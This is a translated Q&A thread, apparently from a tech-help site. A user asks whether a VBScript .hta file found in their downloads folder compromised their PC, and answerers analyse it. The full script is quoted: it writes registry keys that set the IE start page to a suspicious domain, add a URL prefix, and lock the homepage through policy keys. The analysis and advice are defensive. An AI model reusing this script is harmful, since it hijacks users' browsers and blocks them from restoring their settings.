3

Помогите, пожалуйста, определить, скомпрометирован ли мой компьютер или нет.

Я еще не уверен, что это .. Я все еще просматриваю некоторые файлы JavaScript (мой уровень = новичок), которые я нашел во время моих «исследований» ...

История:

  1. Windows 7 x64 Professional, Eset Smart Security 4.2.71.2, последняя версия Firefox, последняя версия Chrome, IE 8
  2. Я нашел в папке загрузки по умолчанию Chrome файл adam-liseli-kizi-otele-goturup-sikiyor.avi.hta Это скрипт VB:

    Set shell = CreateObject("WScript.Shell")
    shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"
    shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"
    shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"
    shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 
    self.Close
    
  3. Я следовал за aarama.net, нашел там фишинговый сайт (я думаю), похожий на Google с большим количеством JavaScript, который я пытаюсь понять прямо сейчас ..

4 ответа4

11

Что ж, выполняя некоторые исследования на уровне сети, я могу вам многое сказать:

  1. Домен был зарегистрирован 20 дней назад.
  2. Регистратор находится в Люксембурге, но номер телефона находится в Дании.
  3. Сайт выглядит как турецкий.
  4. Владелец домена прячется за PrivacyProtect
  5. Сайт размещен в CloudFlair в Сан-Франциско.

В целом это кажется очень очень хитрым

  1. Это новый домен
  2. Регистрационные данные не складываются
  3. Скрывать, кто зарегистрировал домен, не обязательно плохо, но кто-то гнусный сделает это
  4. CloudFlare раздают бесплатные аккаунты с очень небольшим количеством проверок.

Беглый взгляд на javascript и игра с сайтом в Links не бросили ничего слишком неприятного, но я еще не проанализировал JS должным образом (уже почти полночь). Я буду больше копать утром.

Если вы обнаружите, что это определенно вредоносная программа, то вызов CloudFlare будет сделан для того, чтобы предупредить их об этом - они, вероятно, мгновенно закроют сайт.

Обновить

aarama.net перешел на хостинг в Германии, который известен своими хостами для ботов и других хитрых сайтов (your-server.de).

8

Я не говорю много сценариев, но намерения этого, кажется, в основном ясны.

Set shell = CreateObject("WScript.Shell")

Первая строка, я не совсем уверен. Тем не менее, некоторые поиски в Google, кажется, подтверждают мои мысли о том, что это довольно стандартная начальная строка для сценария.

Остальные строки, кажется, устанавливают различные ключи реестра.

shell.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\Prefixes\\mirc","http://aarama.net/","REG_SZ"

Этот добавляет новый префикс URL в Internet Explorer. По сути, каждый раз, когда IE говорят запрашивать ресурс, начинающийся с «mirc». и протокол не указан, он вставит « http://aarama.net/ » перед адресом перед его обработкой. Поэтому, если вы введете «mirc.google.com» в адресную строку, IE переведет его на « http://aarama.net/mirc.google.com ». Это, вероятно, помогает функционировать другим сценариям на вредоносном сайте (или загруженным вредоносным программам).

shell.regwrite "HKLM\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"  
shell.regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\\HomePage","00000001","REG_DWORD"

Они добавляют разделы реестра, которые обычно реализуют контроль групповой политики над Internet Explorer. Вы можете обнаружить, что больше не можете изменить свою домашнюю страницу IE через панель управления.

shell.regwrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ"  
shell.regwrite "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\\Start Page", "http://aarama.net/","REG_SZ" 

Они устанавливают « http://aarama.net/ » на вашу домашнюю страницу, гарантируя, что вы зайдете на сайт хотя бы один раз и получите возможность стать жертвой любого фишингового мошенничества или вредоносного кода. Конечно, предыдущие ключи гарантируют, что вы не просто зайдете один раз, так как вы не можете изменить домашнюю страницу.

self.Close

Опять же, я не говорю на скрипте. Но я думаю, что этот вполне очевидно заканчивает это.

Некоторые вещи, которые вы должны сделать с этой информацией:

1.) (Слишком поздно) Не заходите на этот сайт.

2.) Имейте несколько хороших антивирусных / антивирусных программ, копающихся на вашем компьютере. Мои рекомендации Avast! сканирование во время загрузки, Malwarebytes и SpyBot Search & Destroy. Если возможно, используйте отдельную, хорошо известную одноразовую машину для сканирования. Или получите хороший LiveCD для сканирования.

3.) Проверьте в реестре значения, созданные скриптом. Если они все еще там, сделайте резервную копию вашего реестра, затем удалите созданные значения или измените их на ваши предпочтительные настройки. Первые три должны быть просто сброшены. Последние два, установите ваши предпочтения или «about:blank».

4.) Если после этого вы заметили какие-либо подозрительные действия в вашей системе, пришло время для подхода "ядерное оружие с орбиты". Надеюсь, у вас есть хорошие резервные копии.

4

Это выглядит очень странно. Я бы посоветовал несколько вещей - сначала вредоносных байт - это хороший сканер, и один из них иногда блокируется вредоносным ПО - он эффективен, когда он работает. Кроме этого, ищите странные процессы в диспетчере процессов и netstat.

Я также предложил бы научиться использовать и использовать средство обнаружения руткитов (в случае руткитов) и угонять это для подтверждения - журналы последних очень полезны при попытке определить, было ли вторжение, хотя они требуют некоторой интерпретации.

0

Я не эксперт, но похоже, что он делает этот домен домашней страницей для Internet Explorer. Домен ссылается на фишер Google.

Цель - заставить вас войти в свою учетную запись Google, чтобы они могли собирать учетные записи. Я не очень внимательно посмотрел на сайт, но сомневаюсь, что он делает что-то еще.

Независимо от того, что вы должны сканировать с Malwarebytes, просто чтобы убедиться.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .